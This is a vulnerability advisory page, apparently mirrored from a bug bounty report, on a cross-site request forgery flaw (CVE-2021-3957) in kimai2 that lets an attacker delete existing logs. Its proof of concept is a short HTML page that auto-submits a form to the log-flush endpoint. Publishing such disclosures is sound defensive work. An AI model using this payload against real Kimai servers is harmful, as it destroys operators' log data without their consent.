Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrAsura-n5FA3098A-BA02-45E0-AF56-645E34DBC691
HistoryNov 08, 2021 - 7:29 p.m.

Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2

2021-11-0819:29:52
asura-n
www.huntr.dev
10
csrf
kevinpapst/kimai2
delete functionality
doctor feature
vulnerability
existing logs
bug bounty

EPSS

0.001

Percentile

31.1%

JSON

Description

cross site request forgery vulnerability is present in delete functionality of doctor feature.

Proof of Concept

<html>

<body>

<script>history.pushState(‘’, ‘’, ‘/’)</script>

&lt;form action="https://demo-stable.kimai.org/de_CH/doctor/flush-log"&gt;

  &lt;input type="submit" value="Submit request" /&gt;

&lt;/form&gt;

<script>
document.forms[0].submit();
</script>

</body>
</html>

Impact

This vulnerability is capable of delete the existing logs

Related

prion 1
osv 2
cve 1
veracode 1
github 1
cvelist 1
nvd 1
prion
prion
Cross site request forgery (csrf)
2021-11-19 12:15:00
osv
osv
CVE-2021-3957
2021-11-19 12:15:08
Cross-site Scripting in kimai2
2021-11-23 17:59:40
cve
cve
CVE-2021-3957
2021-11-19 12:15:08
veracode
veracode
Cross Site Request Forgery (CSRF)
2021-11-22 15:19:55
github
github
Cross-site Scripting in kimai2
2021-11-23 17:59:40
cvelist
cvelist
CVE-2021-3957 Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2
2021-11-19 12:00:11
nvd
nvd
CVE-2021-3957
2021-11-19 12:15:08

EPSS

0.001

Percentile

31.1%

JSON
Related for 5FA3098A-BA02-45E0-AF56-645E34DBC691
prion1osv2cve1veracode1github1cvelist1nvd1